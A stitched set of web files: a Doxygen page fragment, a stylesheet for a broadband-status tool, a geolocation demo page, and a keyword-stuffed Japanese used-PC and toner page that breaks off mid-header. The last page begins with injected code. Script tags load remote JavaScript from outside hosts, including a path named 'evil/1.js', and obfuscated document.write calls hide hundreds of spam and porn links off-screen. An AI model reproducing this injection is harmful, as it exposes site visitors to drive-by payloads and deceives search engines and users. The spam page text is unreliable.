class="summary"> <a href="#nested-classes">Classes</a> &#124; <a href="#namespaces">Namespaces</a> </div> <div class="headertitle"> <div class="title">MoonIllumSim/src/main/Simulation.cs File Reference</div> </div> </div> <div class="contents"> <p><a href="_simulation_8cs_source.html">Go to the source code of this file.</a></p> <table class="memberdecls"> <tr><td colspan="2"><h2><a name="nested-classes"></a> Classes</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">class &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="class_moon_illum_sim_1_1_simulation.html">MoonIllumSim::Simulation</a></td></tr> <tr><td colspan="2"><h2><a name="namespaces"></a> Namespaces</h2></td></tr> <tr><td class="memItemLeft" align="right" valign="top">package &#160;</td><td class="memItemRight" valign="bottom"><a class="el" href="namespace_moon_illum_sim.html">MoonIllumSim</a></td></tr> </table> </div> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="_simulation_8cs.html">Simulation.cs</a> </li> <!-- window showing the filter options --> <div id="MSearchSelectWindow" onmouseover="return searchBox.OnSearchSelectShow()" onmouseout="return searchBox.OnSearchSelectHide()" onkeydown="return searchBox.OnSearchSelectKey(event)"> <a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark">&#160;</span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark">&#160;</span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark">&#160;</span>Namespaces</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark">&#160;</span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark">&#160;</span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark">&#160;</span>Variables</a></div> <!-- iframe showing the search results (closed by default) --> <div id="MSearchResultsWindow"> <iframe src="javascript:void(0)" frameborder="0" name="MSearchResults" id="MSearchResults"> </iframe> </div> <li class="footer">Generated by <a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.7.5 </li> </ul> </div> </body> </html>
data_reporting/broadbandstatus.css
LeeThompson/broadbandstatus
/* Broadband Status */ /* Common Elements */ body { color: black; background-color: white; font-family: "Segoe UI", "Tahoma", Helvetica, sans-serif; font-size: 18px; } div.connecterror { color: red; display: inline; } div.connectprogress { color: #D0D060; display: inline; } div.connectok { color: green; display: inline; } div.outofspec { color: red; display: inline; } div.marginal { color: orange; display: inline; } div.acceptable { color: #A0A020; display: inline; } div.recommended { color: green; display: inline; } .controls { background-color: #600000; text-align: center; color: white; font-size: 14px; padding-left: 4px; padding-right: 4px; text-transform: uppercase; font-weight: bold; border: 1px solid black; } .legend { float: left; } .controls a, .controls a:link, .controls a:visited { background-color: #700000; color: #D0D0D0; } .controls a:active { background-color: #FF0000; color: white; } .controls a:focus, .controls a:visited:focus, .controls a:hover, .controls a:visited:hover { background-color: red; color: white; } .debug { color: black; background-color: #F0F040; font-family: "Terminal", "Fixedsys", "Courier New", Courier, monospace; padding: 16px; } h1 { color: black; text-align: center; letter-spacing: 0.4em; font-size: 36px; text-transform: uppercase; } h2 { background-color: #400000; color: white; text-align: left; font-size: 18px; text-transform: uppercase; text-indent: 1em; } h3 { background-color: #400000; color: white; letter-spacing: 0.1em; text-align: left; font-size: 18px; text-transform: uppercase; text-indent: 1em; } h4 { text-align: left; font-size: 18px; text-transform: uppercase; text-indent: 1em; } h5 { text-align: left; font-size: 16px; text-transform: uppercase; text-indent: 1em; } h6 { background-color: #FFFFA0; text-align: center; font-size: 14px; text-transform: uppercase; letter-spacing: 0.1em; margin-top: -1.5em; margin-left: 2em; } a:link { margin-top: -1em; color: black; text-decoration: none; margin-bottom: 1em; } a:active { margin-top: -1em; background-color: #D0D0D0; color: black; text-decoration: none; margin-bottom: 1em; } a:hover { margin-top: -1em; background-color: #E0E0E0; color: black; text-decoration: none; margin-bottom: 1em; } a:visited { margin-top: -1em; color: black; text-decoration: none; margin-bottom: 1em; } blockquote { margin-top: -1em; } small { background-color: white; color: #303030; font-size: 12px; float: right; text-align: right; font-weight: bold; } .footer { margin-top: 50px; background-color: white; color: #303030; font-size: 8px; text-align: left; } /* Tables */ table { border: none; empty-cells: show; table-layout: fixed; white-space: nowrap; margin: auto; } table td { border: none; text-align: left; border-bottom: double; color: black; padding-right: 10px; } table td.eventtime { border: none; text-align: left; border-bottom: double; color: black; } table td.circuit { border: none; text-align: left; border-bottom: double; color: black; } table td.frequency { border: none; text-align: left; border-bottom: double; color: black; } table td.modulation { border: none; text-align: left; border-bottom: double; color: black; } table td.rate { border: none; text-align: left; border-bottom: double; color: black; overflow: hidden; text-overflow: ellipsis; } table td.power { border: none; text-align: left; border-bottom: double; color: black; } table td.snr { border: none; text-align: left; border-bottom: double; color: black; } table td.status { border: none; text-align: left; border-bottom: double; color: black; } table th { background-color: #400000; color: white; text-transform: uppercase; text-align: left; border: none; font-weight: bold; } table td.headings { background-color: #400000; color: white; text-transform: uppercase; text-align: left; border: none; font-weight: bold; padding-left: 2px; font-family: "Arial Narrow", Helvetica, sans-serif; } table td.longtext { text-align: left; border-bottom: double; color: black; padding-right: 14px; text-overflow: ellipsis; overflow: hidden; } tr { text-align: left; color: black; } /* SUBTABLE */ table subtable { border: none; background-color: #40FFFF; empty-cells: show; table-layout: fixed; white-space: nowrap; width: 100%; margin: left; } table td.subtable { border: none; text-align: left; vertical-align: top; } table td.subtable subdata { border: none; text-align: left; vertical-align: top; } } /* GENERAL */ table general { border: none; background-color: #40FFFF; empty-cells: show; table-layout: fixed; white-space: nowrap; width: 100%; margin: left; } table td.general { border: none; text-align: left; vertical-align: top; } table td.periodlabel { border: none; text-align: left; vertical-align: top; } table td.periodtext { border: none; text-align: left; vertical-align: top; } table td.indica { border: none; text-align: left; vertical-align: top; font-size: 10px; } table tr.general { border: none; text-align: left; font-size: 16px; text-transform: uppercase; }
appgyver/dist/app/sensors/geolocation.html
davigp/hybrids
<!DOCTYPE html> <html> <head> <script> window.addEventListener('WebComponentsReady', function() { supersonic.app.splashscreen.hide(); }); </script> <!-- Cloud resource definition file for Supersonic Data --> <script src="/cloud-resources.js"></script> <meta charset="utf8"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <title>geolocation</title> <link rel="stylesheet" href="/components/supersonic/css/supersonic.css" /> <link rel="stylesheet" href="/app/common/stylesheets/application.css" /> <link rel="import" href="/components/supersonic/components/import.html"> <script src="http://localhost/cordova.js"></script> <script src="/components/steroids-js/steroids.js"></script> <script src="/components/angular/angular.js"></script> <script src="/components/chartjs/Chart.min.js"></script> <script src="http://maps.google.com/maps/api/js?sensor=true"></script> <script src="/components/supersonic/supersonic.js"></script> <script src="/components/webcomponentsjs/webcomponents.js"></script> <script src="/app/common.js"></script> <script src="/app/sensors.js"></script> </head> <body ng-app="sensors"> <div ng-controller="GeolocationController"> <super-navbar> <super-navbar-title> geolocation </super-navbar-title> </super-navbar> <kitchensink-google-maps position="position"></kitchensink-google-maps> <div class="padding"> <div class="loading-message" ng-show="isWatchingPosition || isGettingPosition"> <img src="/icons/loading.svg" height="26" alt=""> {{isWatchingPosition? "Continuously watching position..." : "Getting position..."}} </div> <div class="loading-message" ng-hide="isWatchingPosition || isGettingPosition"> Ready! </div> <br> <table class="geolocation-table"> <tr> <td>Latitude</td> <td>{{position.latitude}}</td> </tr> <tr> <td>Longitude</td> <td>{{position.longitude}}</td> </tr> <tr> <td>Accuracy</td> <td>{{position.accuracy}} m</td> </tr> <tr ng-hide="position.altitude == undefined"> <td>Altitude</td> <td>{{position.altitude}} m</td> </tr> <tr ng-hide="position.altitudeAccuracy == undefined"> <td>Alt. accuracy</td> <td>{{position.altitudeAccuracy}} m</td> </tr> <tr ng-hide="position.heading == undefined"> <td>Heading</td> <td>{{position.heading}}</td> </tr> <tr ng-hide="position.speed == undefined"> <td>Speed</td> <td>{{position.speed}} m/s</td> </tr> </table> <br> <button ng-click="getPosition()" class="button button-block button-positive" ng-disabled="isGettingPosition || isWatchingPosition"> Get position </button> <button ng-click="toggleWatch()" class="button button-block" ng-class="{'button-positive': !isWatchingPosition, 'button-assertive': isWatchingPosition}"> {{isWatchingPosition ? "Stop watching position" : "Watch for changes in position"}} </button> </div> </div> </body> </html>
images/Core2Duo/020410521s24ut.html
ForAEdesWeb/AEW2
<script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script> <script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script> <a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a> <a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a> <a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a> <a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a> <a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a> <a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a> <a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a> <a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a> <a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a> <a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a> <a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a> <a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a> <a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a> <a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a> <a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a> <a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a> <a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a> <a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a> <a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a> <a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a> <a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a> <a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a> <a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a> <a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a> <a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a> <a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a> <a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a> <a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a> <a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a> <a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a> <a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a> <a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a> <a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a> <a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a> <a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a> <a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a> <a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a> <a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a> <a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a> <a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a> <a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a> <a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a> <a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a> <a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a> <a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a> <a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a> <a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a> <a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a> <a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a> <a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a> <a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a> <a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a> <a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a> <a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a> <a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a> <a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a> <a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a> <a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a> <a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a> <a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a> <a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a> <a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a> <a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a> <a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a> <a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a> <a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a> <a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a> <a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a> <a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a> <a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a> <a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a> <a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a> <a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a> <a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a> <a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a> <a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a> <a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a> <a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a> <a class="z7z8z9z6" href="http://www.ymrxun.com/">http://www.ymrxun.com/</a> <a class="z7z8z9z6" href="http://www.lkrecc.com/">http://www.lkrecc.com/</a> <a class="z7z8z9z6" href="http://www.kgahjl.com/">http://www.kgahjl.com/</a> <a class="z7z8z9z6" href="http://www.kqdmep.com/">http://www.kqdmep.com/</a> <a class="z7z8z9z6" href="http://www.vwlwcu.com/">http://www.vwlwcu.com/</a> <a class="z7z8z9z6" href="http://www.zuixinlunlidianying.com/">http://www.zuixinlunlidianying.com/</a> <a class="z7z8z9z6" href="http://www.daxiangjiaowangzhi.com/">http://www.daxiangjiaowangzhi.com/</a> <a class="z7z8z9z6" href="http://www.snnfi.com/">http://www.snnfi.com/</a> <a class="z7z8z9z6" href="http://www.vfdyd.com/">http://www.vfdyd.com/</a> <a class="z7z8z9z6" href="http://www.lwezk.com/">http://www.lwezk.com/</a> <a class="z7z8z9z6" href="http://www.fpibm.com/">http://www.fpibm.com/</a> <a class="z7z8z9z6" href="http://www.xjvdr.com/">http://www.xjvdr.com/</a> <a class="z7z8z9z6" href="http://www.kvwqf.com/">http://www.kvwqf.com/</a> <a class="z7z8z9z6" href="http://www.utakf.com/">http://www.utakf.com/</a> <a class="z7z8z9z6" href="http://www.gmjeu.com/">http://www.gmjeu.com/</a> <a class="z7z8z9z6" href="http://www.pugfa.com/">http://www.pugfa.com/</a> <a class="z7z8z9z6" href="http://www.bldek.com/">http://www.bldek.com/</a> <a class="z7z8z9z6" href="http://www.vdidu.com/">http://www.vdidu.com/</a> <a class="z7z8z9z6" href="http://www.tufnc.com/">http://www.tufnc.com/</a> <a class="z7z8z9z6" href="http://www.wqxri.com/">http://www.wqxri.com/</a> <a class="z7z8z9z6" href="http://www.uaozz.com/">http://www.uaozz.com/</a> <a class="z7z8z9z6" href="http://www.nhpbd.com/">http://www.nhpbd.com/</a> <a class="z7z8z9z6" href="http://www.dinbz.com/">http://www.dinbz.com/</a> <a class="z7z8z9z6" href="http://www.bopjc.com/">http://www.bopjc.com/</a> <a class="z7z8z9z6" href="http://www.rvkip.com/">http://www.rvkip.com/</a> <a class="z7z8z9z6" href="http://www.jsmqe.com/">http://www.jsmqe.com/</a> <a class="z7z8z9z6" href="http://www.vwygx.com/">http://www.vwygx.com/</a> <a class="z7z8z9z6" href="http://www.zgjm-org.com/">http://www.zgjm-org.com/</a> <a class="z7z8z9z6" href="http://www.shenyangsiyue.com/">http://www.shenyangsiyue.com/</a> <a class="z7z8z9z6" href="http://www.hongsang.net/">http://www.hongsang.net/</a> <a class="z7z8z9z6" href="http://www.gpmrg.cc/">http://www.gpmrg.cc/</a> <a class="z7z8z9z6" href="http://www.knfut.cc/">http://www.knfut.cc/</a> <a class="z7z8z9z6" href="http://www.kjqdh.cc/">http://www.kjqdh.cc/</a> <a class="z7z8z9z6" href="http://www.huang62.win/">http://www.huang62.win/</a> <a class="z7z8z9z6" href="http://www.qiong19.win/">http://www.qiong19.win/</a> <a class="z7z8z9z6" href="http://www.chang34.win/">http://www.chang34.win/</a> <a class="z7z8z9z6" href="http://www.huang71.win/">http://www.huang71.win/</a> <a class="z7z8z9z6" href="http://www.xiong10.win/">http://www.xiong10.win/</a> <a class="z7z8z9z6" href="http://www.chong14.win/">http://www.chong14.win/</a> <a class="z7z8z9z6" href="http://www.chong94.win/">http://www.chong94.win/</a> <a class="z7z8z9z6" href="http://www.zheng23.win/">http://www.zheng23.win/</a> <a class="z7z8z9z6" href="http://www.cheng14.win/">http://www.cheng14.win/</a> <a class="z7z8z9z6" href="http://www.shang72.win/">http://www.shang72.win/</a> <a class="z7z8z9z6" href="http://www.sudanj.win/">http://www.sudanj.win/</a> <a class="z7z8z9z6" href="http://www.russias.win/">http://www.russias.win/</a> <a class="z7z8z9z6" href="http://www.malim.win/">http://www.malim.win/</a> <a class="z7z8z9z6" href="http://www.nigery.win/">http://www.nigery.win/</a> <a class="z7z8z9z6" href="http://www.malix.win/">http://www.malix.win/</a> <a class="z7z8z9z6" href="http://www.peruf.win/">http://www.peruf.win/</a> <a class="z7z8z9z6" href="http://www.iraqq.win/">http://www.iraqq.win/</a> <a class="z7z8z9z6" href="http://www.nepali.win/">http://www.nepali.win/</a> <a class="z7z8z9z6" href="http://www.syriax.win/">http://www.syriax.win/</a> <a class="z7z8z9z6" href="http://www.junnp.pw/">http://www.junnp.pw/</a> <a class="z7z8z9z6" href="http://www.junnp.win/">http://www.junnp.win/</a> <a class="z7z8z9z6" href="http://www.zanpianba.com/">http://www.zanpianba.com/</a> <a class="z7z8z9z6" href="http://www.shoujimaopian.com/">http://www.shoujimaopian.com/</a> <a class="z7z8z9z6" href="http://www.gaoqingkanpian.com/">http://www.gaoqingkanpian.com/</a> <a class="z7z8z9z6" href="http://www.kuaibokanpian.com/">http://www.kuaibokanpian.com/</a> <a class="z7z8z9z6" href="http://www.baidukanpian.com/">http://www.baidukanpian.com/</a> <a class="z7z8z9z6" href="http://www.wwwren99com.top/">http://www.wwwren99com.top/</a> <a class="z7z8z9z6" href="http://www.wwwdgshunyuancom.top/">http://www.wwwdgshunyuancom.top/</a> <a class="z7z8z9z6" href="http://www.xianfengziyuancom.top/">http://www.xianfengziyuancom.top/</a> <a class="z7z8z9z6" href="http://www.www96yyxfcom.top/">http://www.www96yyxfcom.top/</a> <a class="z7z8z9z6" href="http://www.www361dywnet.top/">http://www.www361dywnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwbambootechcc.top/">http://www.wwwbambootechcc.top/</a> <a class="z7z8z9z6" href="http://www.wwwluoqiqicom.top/">http://www.wwwluoqiqicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyyxfnrzcom.top/">http://www.wwwyyxfnrzcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwzhengdadycom.top/">http://www.wwwzhengdadycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyewaishengcuncom.top/">http://www.wwwyewaishengcuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcong3win.top/">http://www.wwwcong3win.top/</a> <a class="z7z8z9z6" href="http://www.wwwmh-oemcn.top/">http://www.wwwmh-oemcn.top/</a> <a class="z7z8z9z6" href="http://www.henhen168com.top/">http://www.henhen168com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhztuokuncom.top/">http://www.wwwhztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwyasyzxcn.top/">http://www.wwwyasyzxcn.top/</a> <a class="z7z8z9z6" href="http://www.www9hkucom.top/">http://www.www9hkucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwguokrcom.top/">http://www.wwwguokrcom.top/</a> <a class="z7z8z9z6" href="http://www.avhhhhcom.top/">http://www.avhhhhcom.top/</a> <a class="z7z8z9z6" href="http://www.shouyouaipaicom.top/">http://www.shouyouaipaicom.top/</a> <a class="z7z8z9z6" href="http://www.wwwdouyutvcom.top/">http://www.wwwdouyutvcom.top/</a> <a class="z7z8z9z6" href="http://www.bbsptbuscom.top/">http://www.bbsptbuscom.top/</a> <a class="z7z8z9z6" href="http://www.miphonetgbuscom.top/">http://www.miphonetgbuscom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtjkunchengcom.top/">http://www.wwwtjkunchengcom.top/</a> <a class="z7z8z9z6" href="http://www.lolboxduowancom.top/">http://www.lolboxduowancom.top/</a> <a class="z7z8z9z6" href="http://www.wwwtaoyuancncom.top/">http://www.wwwtaoyuancncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwngffwcomcn.top/">http://www.wwwngffwcomcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwqingzhouwanhecom.top/">http://www.wwwqingzhouwanhecom.top/</a> <a class="z7z8z9z6" href="http://www.wwwckyygcn.top/">http://www.wwwckyygcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwcdcjzcn.top/">http://www.wwwcdcjzcn.top/</a> <a class="z7z8z9z6" href="http://www.m6downnet.top/">http://www.m6downnet.top/</a> <a class="z7z8z9z6" href="http://www.msmzycom.top/">http://www.msmzycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwcaobolcom.top/">http://www.wwwcaobolcom.top/</a> <a class="z7z8z9z6" href="http://www.m3533com.top/">http://www.m3533com.top/</a> <a class="z7z8z9z6" href="http://www.gmgamedogcn.top/">http://www.gmgamedogcn.top/</a> <a class="z7z8z9z6" href="http://www.m289com.top/">http://www.m289com.top/</a> <a class="z7z8z9z6" href="http://www.jcbnscom.top/">http://www.jcbnscom.top/</a> <a class="z7z8z9z6" href="http://www.www99daocom.top/">http://www.www99daocom.top/</a> <a class="z7z8z9z6" href="http://www.3gali213net.top/">http://www.3gali213net.top/</a> <a class="z7z8z9z6" href="http://www.wwwmeidaiguojicom.top/">http://www.wwwmeidaiguojicom.top/</a> <a class="z7z8z9z6" href="http://www.msz1001net.top/">http://www.msz1001net.top/</a> <a class="z7z8z9z6" href="http://www.luyiluueappcom.top/">http://www.luyiluueappcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwvcnnnet.top/">http://www.wwwvcnnnet.top/</a> <a class="z7z8z9z6" href="http://www.wwwchaoaicaicom.top/">http://www.wwwchaoaicaicom.top/</a> <a class="z7z8z9z6" href="http://www.mcnmocom.top/">http://www.mcnmocom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqiuxia88com.top/">http://www.wwwqiuxia88com.top/</a> <a class="z7z8z9z6" href="http://www.www5253com.top/">http://www.www5253com.top/</a> <a class="z7z8z9z6" href="http://www.wwwhaichuanwaiyucom.top/">http://www.wwwhaichuanwaiyucom.top/</a> <a class="z7z8z9z6" href="http://www.wwwulunarcn.top/">http://www.wwwulunarcn.top/</a> <a class="z7z8z9z6" href="http://www.wwwvideo6868com.top/">http://www.wwwvideo6868com.top/</a> <a class="z7z8z9z6" href="http://www.wwwythmbxgcom.top/">http://www.wwwythmbxgcom.top/</a> <a class="z7z8z9z6" href="http://www.gakaycom.top/">http://www.gakaycom.top/</a> <a class="z7z8z9z6" href="http://www.wwwhf1zcom.top/">http://www.wwwhf1zcom.top/</a> <a class="z7z8z9z6" href="http://www.wwwkrd17net.top/">http://www.wwwkrd17net.top/</a> <a class="z7z8z9z6" href="http://www.qqav4444net.top/">http://www.qqav4444net.top/</a> <a class="z7z8z9z6" href="http://www.www5a78com.top/">http://www.www5a78com.top/</a> <a class="z7z8z9z6" href="http://www.hztuokuncom.top/">http://www.hztuokuncom.top/</a> <a class="z7z8z9z6" href="http://www.wwwqqqav7979net.top/">http://www.wwwqqqav7979net.top/</a> <a class="z7z8z9z6" href="http://www.sscaoacom.top/">http://www.sscaoacom.top/</a> <a class="z7z8z9z6" href="http://www.51yeyelu.info/">http://www.51yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.52luyilu.info/">http://www.52luyilu.info/</a> <a class="z7z8z9z6" href="http://www.52yeyelu.info/">http://www.52yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.91yeyelu.info/">http://www.91yeyelu.info/</a> <a class="z7z8z9z6" href="http://www.yeyelupic.info/">http://www.yeyelupic.info/</a> <script>document.write ('</' + 'di' + 'v c' + 'l' + 'ass=' + '"' + 'z7z' + '8z9z' + '6' + '"' + '>');</script> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ja" lang="ja"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="Content-Script-Type" content="text/javascript" /> <meta http-equiv="Content-Style-Type" content="text/css" /> <title>【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n </title> <meta name="keywords" content="【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n " /> <meta name="description" content="中古パソコン★リカバリ内蔵 多機能ワイドノート★ 富士通 LIFEBOOK FMV-A8290 2GBメモリ DVDマルチ 15.4型ワイド液晶 リカバリ内蔵 無線LAN Windows7Pro 中古ノートパソコン 【MicrosoftOffice付(2007)】 【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,富士通 FMV LIFEBOOK B8260 Core2Duo U7600 2GB WindowsXP マイクロソフト?オフィスXP 【中古ノートパソコン】 【中古】" /> <meta name="viewport" content="width=device-width; initial-scale=1.0;" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:site" content="中古パソコン ★Lenovoモバイルが訳ありのため激安★IBM Lenovo ThinkPad X61s 2GBメモリ デュアルコア搭載 無線LAN Windows7 【MicrosoftOffice2003】 中古ノート Office付き 【中古】" /> <meta property="og:title" content="★リカバリ&マニュアル付属で安心!★ 富士通 BIBLO FMV-NB70S 1GBメモリ100GBHDD 無線LAN搭載 15インチ液晶 WindowsXP DVDスーパーマルチ マイクロソフト?オフィスXP 【中古】" /> <meta property="og:description" content="中古パソコン ★地デジが観れる一体型パソコン★富士通 FMV-DESKPOWER F/C70D 4GBメモリ Core2Duo DVDマルチ 無線LAN 500GB 19型ワイド Windows7 中古デスクトップ 【KingosftOffice付(2013)】 【中古】,【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★DELL人気Win7モバイル★ DELL Latitude D430 2GBメモリ Core2Duo 外付けDVD 無線LAN B5サイズ Windows7 中古ノートパソコン 【MicrosoftOffice付(XP)】 【中古】" /> <meta property="og:site_name" content="【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n " /> <link rel="stylesheet" type="text/css" href="http://ceron.jp/css.css" media="all" /> <link rel="stylesheet" type="text/css" href="http://ceron.jp/js/jquery-ui.css" media="all" /> <link rel="alternate" type="application/rss+xml" title="RSS" href="p-9275.html" /> <script type="text/javascript" src="./hippo1224.js"></script>p-9275.html" </head> <body> <div id="main" class="top"> <div id="header"> <div id="header_inner"> <div id="leader">【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n ,中古パソコン ★高性能クアッドコア搭載 Win7デスクトップ★Lenovo ThinkCentre A58 4GBメモリ Core2Quad DVDマルチ Windows7 中古デスクトップ 【KingosftOffice付(2013)】 【中古】<span class="icon_set"> <a href="http://www.twitter.com/" target="_blank" title="twitter【沖データ純正】沖データ トナーカートリッジ イエロー C5900dn/C5800dn/C5800n " class="icon icon_twitter"></a> <a href="https://www.facebook.com/" target="_blank" 